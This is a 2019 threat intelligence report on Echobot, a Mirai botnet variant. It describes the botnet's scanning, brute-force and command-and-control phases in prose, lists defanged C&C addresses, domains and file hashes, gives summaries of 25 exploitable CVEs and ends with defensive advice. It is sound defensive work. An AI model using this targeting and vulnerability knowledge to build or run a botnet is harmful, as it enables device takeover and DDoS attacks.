Threat Intelligence Report: New Mirai Variant – Echobot

Date: 18th June 2019

Summary

In September 2016, a French cloud computing company (OVH) suffered a distributed denial of service (DDoS) attack with a total capacity of up to 1.5 terabits per second and one month later, there was a another DDoS attack that affected the majority of the US East Coast and left much of the internet inaccessible for its users. Domain Name System (DNS) provider Dyn was targeted by the Mirai Botnet and the attack was accomplished through a large number of DNS lookup requests from tens of millions of IP addresses. This resulted in the unavailability of websites and services of many international companies; such as Amazon, Netflix and Spotify. After the attack, the source code for Mirai was released into the wild and this enabled many hackers to copy and further develop the code, which has resulted in new variants. Due to the amount of new variations, tracing those responsible became much more difficult.

In March 2019, the security community discovered a new Mirai variant and it is primarily aimed at Internet of Things (IoT) devices within companies. This can increase the attack power as cybercriminals gain access to greater bandwidth over corporate networks. The latest sample contains a total of 27 exploits, some of which are new to Mirai and these additional features give the program an even larger attack surface.

The availability of the Mirai source code allows authors to create their own version, Mirai is now used as a framework and botnet authors can quickly add in new exploits and functionality. Within two months of the source codes release, the number of bot instances more than doubled from 213,000 to 493,000. Since 2016, new variants of the botnet have emerged in the wild; Satori, JenX, OMG, Matusa, Wicked and Yowai.

Conclusions

Recent reports show that there has been a rise in DDoS related attacks. During Q1 of 2019, Link11 (a cloud security platform) registered 11,177 DDoS attacks on European targets. DDoS attacks achieved volumes of over 100 Gbps with the peak DDoS attack bandwidth reaching 224 Gbps. The mean bandwidth was 3.8 Gbps and this represents an increase of more than 70%, compared with the 2.2 Gbps that was recorded during the same period in the previous year.

IoT botnets continue to expand their attack surface. This is achieved by incorporating multiple exploits to target a plethora of IoT devices, or by adding to the list of default credentials they brute force, or both. The new Mirai variant is a continuation of efforts by Linux malware authors to scout for a wider range, so they can add a large number of IoT devices to form larger botnets, thus resulting in greater firepower for DDoS attacks.

Tactics, Techniques and Procedures

2016 was not the first time an IoT botnet hit the market. There have been Mirai-like predecessors since 2014; such as Bashlite, Gafgytm, QBot, Remaiten and Torlus. The code of Mirai was created from the improved codes of its forerunners and it was compiled by several developers. In 2014 it was finalised by a group of hackers and by using the Mirai botnet, they were able to slow down video game servers such as Minecraft and even take them off the internet. This cost their operators a lot of money.

Mirai scans the internet for IoT devices that run on the ARC processor and this processor runs a stripped-down version of the Linux operating system. If the default username and password have not been changed, then Mirai is able to log into the device and infect it. Although the original creators have been caught, their source code remains in the wild and new variants have evolved from Mirai such as; Okiru, Satori and Masuta, to name a few. One variant, OMG, transforms IoT devices into proxies and this allows cyber criminals to remain anonymous.

The Mirai botnet comprises four major components. The bot component (1) is the malware that infects devices and its twofold aim is to propagate the infection to misconfigured devices, then to attack a target server as soon as it receives the corresponding command from the person controlling the bot (Botmaster). There is also a command & control (C&C) server (2) and this provides the botmaster with a centralised management interface, this is used to check the botnet’s condition and orchestrate new DDoS attacks. With the use of the anonymous Tor network, communication with other parts of the infrastructure take place and a “loader” (3) facilitates the dissemination of executables which target different platforms by communicating with new victims. Finally, a report server (4) maintains the database which details all devices in the botnet.

Phase One: Reconnaissance Mirai first scans random public IP addresses through TCP ports 23 or 2323 where it will send asynchronous stateless TCP SYN probes to pseudorandom IPv4 addresses, excluding those that are in a hard-coded IP blacklist, this helps to avoid detection. The scan looks for devices that run Telnet or SSH and attempts to log in using a hardcoded dictionary of IoT credentials. It will utilise this technique to verify whether a response was obtained and upon verification, the botnet attempts to take control of the device.

Phase Two: Brute Force After reconnaissance, the bot then initiates a brute force attack to discover the default credentials of weakly configured IoT devices. It will attempt to establish a Telnet connection using username and password pairs that are selected randomly from a pre-configured list of 62 credentials. The bot will forward various characteristics of the device to the report server through a different port. After authentication, the host then reports its IP address, port and authentication credentials back to the C&C server.

Phase Three: Command & Control Using a C&C server, the botmaster will check for new victims to target as well as the botnet’s current status by communicating with the report server, usually through Tor. After a decision has been made on what devices to infect, an “infect” command is issued by the botmaster in the “loader” which contains all necessary details that include; IP address and hardware architecture. The loader then logs into the target device and instruct is to download and execute the corresponding binary version of the malware.

Phase Four: Execution When the malware executes it will attempt to protect itself from other malware, this process involves shutting down points of intrusion such as Telnet and Secure Shell (SSH) services. To retrieve attack commands, the newly recruited bot instance will communicate with the C&C server by resolving a domain name hardcoded in the executable, rather than a static IP address. This results in the botmaster being able to change the IP address over time without modifying the binary and without extra communication. From here the botmaster will instruct all bot instances to commence an attack against a target by issuing a command through the C&C server. The bots will start attacking the target, utilising different attack variations such as; TCP & HTTP flooding and Generic Routing Encapsulation (GRE).

Echobot Echobot evolved from Mirai, it is based upon the same source code and targets flaws in enterprise tools. On top of the vulnerabilities that Mirai exploits, Echobot is working on expanding its exploit arsenal in order to cast a wider net than its predecessors, potentially infecting systems found within businesses. Mirai preyed upon the default credentials in consumer IoT devices, but Echobot and similar variants are creeping into the enterprise space. Echobot is also looking further back in time to find long-forgotten security flaws that can be exploited. Researchers have discovered more than 20 different exploits in Echobot, all of which are used for its infection vectors. On top of Mirai’s source code, Echobot adds extra modules and it is now using vulnerabilities in enterprise web and networking software to infect and propagate malware.

Indicators of Compromise

  • 185[.]25[.]51[.]115 – This IP has two detections in 2019 (Virus Total) and has been used as a C&C server in the past
  • 93[.]158[.]216[.]170 – This IP has had one detection in 2019 (Virus Total), it has been blacklisted (IP Void) once and has been used in the past to host C&C server
  • 46[.]166[.]185[.]34 – This IP is associated with malicious activity and has had many detections in 2019 (Virus Total), it has been used as a C&C server in the past
  • 45[.]119[.]127[.]190 – This IP is associated with malicious activity and has many detections in 2019 (Virus Total), it has been used to host C&C server in the past
URLs Description
http[:]//cnc[.]disabled[.]racing/ URL has four detections (Virus Total), Zscaler class this as malicious
Fucklua[.]fbisupport[.]com URL has three detections (Virus Total), Zscaler class this as malicious
Im[.]lateto[.]work URL has four detections (Virus Total), Zscaler class this as malicious
Imscaredaf[.]xyz URL has four detections (Virus Total), Zscaler class this as malicious
Network[.]santasbigcandycane[.]cx URL has three detections (Virus Total), Zscaler class this as malicious
Netwxrk[.]org URL has four detections (Virus Total), Zscaler class this as malicious
New[.]swinginwithme[.]ru URL has three detections (Virus Total), Zscaler class this as malicious
Report[.]laatmaarzittenjoh[.]cf URL has three detections (Virus Total), Zscaler class this as malicious
Report[.]santasbigcandycane[.]cx URL has four detections (Virus Total), Zscaler class this as malicious
Report[.]xf0[.]pw URL has four detections (Virus Total), Zscaler class this as malicious
Youre[.]lateto[.]work URL has three detections (Virus Total), Zscaler class this as malicious
http[:]//cmdmirai[.]tk/ URL has one detection (Virus Total), Zscaler class this as malicious
http[:]//cnc[.]mirai[.]com/ URL has one detection (Virus Total), Zscaler class this as malicious
http[:]//iotmirai[.]tk/ URL has one detection (Virus Total), Zscaler class this as malicious
http[:]//miraibotnet[.]ml/ URL has three detections but is has been associated with malicious shell scripts (Virus Total), Zscaler class this as malicious
http[:]//miraibotnet[.]online/ URL has four detections (Virus Total), Zscaler class this as malicious
http[:]//miraihoneypot[.]tk/ URL has two detections (Virus Total), Zscaler class this as malicious
Mirainet[.]ml URL has several detections relating to file downloads (Virus Total), Zscaler class this as malicious
Mirainet[.]tk URL has several detections relating to file downloads (Virus Total), Zscaler class this as malicious
  CVE Affects
1 CVE-2009-0545 ‘cgi-bin/kerbynet’ ZeroShell allows remote attackers to execute arbitrary commands via shell metacharacters
2 CVE-2009-5156 ASMAX AR-804gu 66.34.1 devices. There is Command Injection via the cgi-bin/script query string.
3 CVE-2009-5157 On Linksys WAG54G2 1.00.10 devices, there is authenticated command injection via shell metacharacters
4 CVE-2009-2765 httpd.c in httpd in the management GUI in DD-WRT 24 sp1, allows remote attackers to execute arbitrary commands via shell metacharacters
5 CVE-2010-5330 Ubiquiti Nanostation5 (Air OS), Command Injection exists via a GET request to stainfo.cgi
6 CVE-2013-7471 D-Link UPnP SOAP Command injection vulnerability via shell metacharacters in the NewInternalClient, NewExternalPort, or NewInternalPort element of a SOAP POST request
7 CVE-2013-5758 Yealink CoIP Phone SIP-T38G remote command execution
8 CVE-2014-8361 SOAP service in Realtek SDK allows remote attackers to execute arbitrary code via a crafted NewInternalClient request.
9 CVE-2016-6255 Portable UPnP SDK before 1.6.21 allows remote attackers to write to arbitrary files in the webroot via a POST request without a registered handler
10 CVE-2016-10760 Seowon Intech routers, there is a Command Injection vulnerability in diagnostic.cgi via shell metacharacters in the ping_ipaddr parameter
11 CVE-2017-18377 Wireless IP Camera (P2P) WIFICAM cameras. There is Command Injection in the set_ftp.cgi script via shell metacharacters in the pwd variable
12 CVE-2017-5173 Improper Neutralization of Special Elements (in an OS command) issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are not properly neutralized, an attacker can call multiple parameters that can allow access to the root level operating system which could allow remote code execution.
13 CVE-2017-14135 opendreambox 2.0.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters
14 CVE-2017-18377 Wireless IP Camera (P2P) WIFICAM cameras. There is Command Injection in the set_ftp.cgi script via shell metacharacters
15 CVE-2018-20841 HooToo TripMate Titan HT-TM05 and HT-05 routers allow remote command execution via shell metacharacters
16 CVE-2018-6961 VMware NSX SD-WAN Edge contains a command injection vulnerability in the local web UI component. Successful exploitation of this issue could result in remote code execution
17 CVE-2018-11510 ASUSTOR NAS portal suffers from an unauthenticated remote code execution vulnerability
18 CVE-2018-15887 ASUS Wireless-N300 ADSL Modem Router is prone to Authenticated Remote Command Execution, which allows a remote attacker to execute arbitrary OS commands via service parameters, such as shell metacharacters
19 CVE-2018-7841 SQL Injection vulnerability exists in U.motion builder, could lead to remote code execution when an improper set of characters is entered.
20 CVE-2018-11138 Quest KACE System Management Appliance is accessible by anonymous users and can be abused to execute arbitrary commands on the system
21 CVE-2018-14933 NUUO NVRmini devices allows Remote Command Execution via shell metacharacters
22 CVE-2018-17173 LG SuperSign CMS allows remote attackers to execute arbitrary code
23 CVE-2019-3929 Crestron AM-100 & AM-101, Blackbox HD, Barco WePresent WiPG-1000P, vulnerable to command injection. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root
24 CVE-2019-2725 Oracle WebLogic Server component of Oracle Fusion Middleware, easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. 
25 CVE-2019-12780 The Belkin Wemo Enabled Crock-Pot allows command injection in the Wemo UPnP API via the SmartDevURL argument to the SetSmartDevInfo action. A simple POST request can allow an attacker to execute commands without authentication.
Mirai and Echobot Hashes (SHA-256)
bf10c37ea0c8db49754ac6a0040a601ed425d5ad4d7c8e0ff764cc29037d1b57
65de6303edb13128c26b34b3d3f1a5b78f19302f0c3822b5f82573c045d96c78
c483618671766847fc75ea79fdc201df2e4a93f501dc98ec9c6f283fb1d4336c
930486713426db5072600c504427ea37f108ee2cee7c7c289866164a83f3f356
c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f
62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6
1bf953862e0ba56144f3469a7915d9e25737a7a75d4d8e64753c9e4ecac96cfc
ded9c77a46726c8dcebbbe0cf945b6c97e17728aa6ddc1d28dfad300371fa921
d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89
2238c81031ca78f4df121c94e1fca5368099b6003c30fef83768fef65ce09e9f

Historical Artefacts

This section refers to known IOCs that were detected and used in the past, to either distribute malicious content or host C&C servers. They have since been inactive or classed as ‘benign’.

IP Address Description
192[.]227[.]222[.]73 These IPs now have zero detections (Virus Total), but they have been used in the past to host C&C server
192[.]227[.]222[.]74
192[.]227[.]222[.]75
192[.]227[.]222[.]76
118[.]89[.]41[.]125 This IP has zero detections (Virus Total) and it has not been blacklisted, but it has been used to host a C&C server in the past
54[.]187[.]144[.]227 This IP had detections in the past mainly relating to downloading files (Virus Total), it hasn’t had any detections in 2019 but it has been blacklisted once (IP Void), it was used in the past for C&C server
46[.]183[.]223[.]229 This IP was last detected towards the end of 2018 (Virus Total), no detections in 2019 but was used as a C&C server in the past
35[.]162[.]249[.]35 These IPs have zero detections (Virus Total), they have been blacklisted (IP Void) once and they were used as a C&C server in the past
5[.]249[.]154[.]190
35[.]162[.]249[.]35 These IPs have zero detections (Virus Total), they have been blacklisted (IP Void) once and they were used as a C&C server in the past
5[.]249[.]154[.]190
188[.]166[.]65[.]12 These IPs have been blacklisted (IP Void) by at least one vendor, but they have zero detections (Virus Total), they have been used in the past to host C&C server
188[.]166[.]189[.]189
208[.]146[.]44[.]1 This IP was last detected in 2018, no detections in 2019 (Virus Total), it was used in the past for C&C server
URLS Description
http[:]//dongs[.]disabled[.]racing/ URL has one detection (Virus Total), Zscaler class this as benign
http[:]//gay[.]disabled[.]racing/ URL has two detections (Virus Total), Zscaler class this as benign
Kankerc[.]queryhost[.]xyz URL has two detections (Virus Total), Zscaler class this as benign
Lol[.]disabled[.]racing URL has two detections (Virus Total), Zscaler class this as benign
Penis[.]disabled[.]racing URL has two detections (Virus Total), Zscaler class this as benign
Report[.]disabled[.]racing URL has three detections (Virus Total), Zscaler class this as benign
Report[.]queryhost[.]xyz URL has two detections (Virus Total), Zscaler class this as benign

Advice

The nature of bots and botnets requires specific awareness and attention from businesses and security professionals. The Echobot variant of Mirai targets network-attached storage devices, routers, IP cameras, Ip Phones, network video recorders and wireless presentation systems. It then looks to propagate through an Enterprise network space. The following advice will help in defending against bots and botnets.

  • Use intrusion detection (IDS) or intrusion prevention system (IPS) monitoring. IDS and IPS running on the internal network can identify suspicious activity and it can act to halt the event.
  • Block unsolicited inbound traffic at the perimeter firewall. If a computer system(s) inside the network are compromised, blocking the traffic at the perimeter firewall means malicious actors cannot communicate with the botnet.
  • Block outbound traffic on port 25. On the network, only known email servers should be allowed to distribute SMTP email traffic. Blocking outbound SMTP traffic from unknown email sources can help stop the spread of malware threats, it can also prevent devices on the internal network from being used as spam distribution points.
  • Run up-to-date Antivirus software. Known bot threats can be detected and removed by antivirus products. Performing these scans on a regular basis  with up-to-date software can locate and remove most bot infections.
  • Implement filters at the email gateway. Filter out emails with known malspam indicators and block suspicious IP addresses at the firewall.
  • Educate and train employees on social engineering and phishing. (i.e. Don’t open suspicious emails or click on the links provided in such emails).
  • If there is not a policy regarding suspicious emails, consider creating one and specify that all suspicious emails should be reported to the security and/or IT departments.
  • Improve security policies and procedures for all devices, especially IoT devices as this is the main attack vector.
  • Keep computer systems patched. Echobot has an army of vulnerabilities that can be exploited in order to propagate and compromise vulnerable systems. Patched systems will provide less opportunity for infection.
  • Be aware of old vulnerabilities. Echobot targets systems that have possibly remained in service but had vulnerabilities that are now forgotten.

Leave a Reply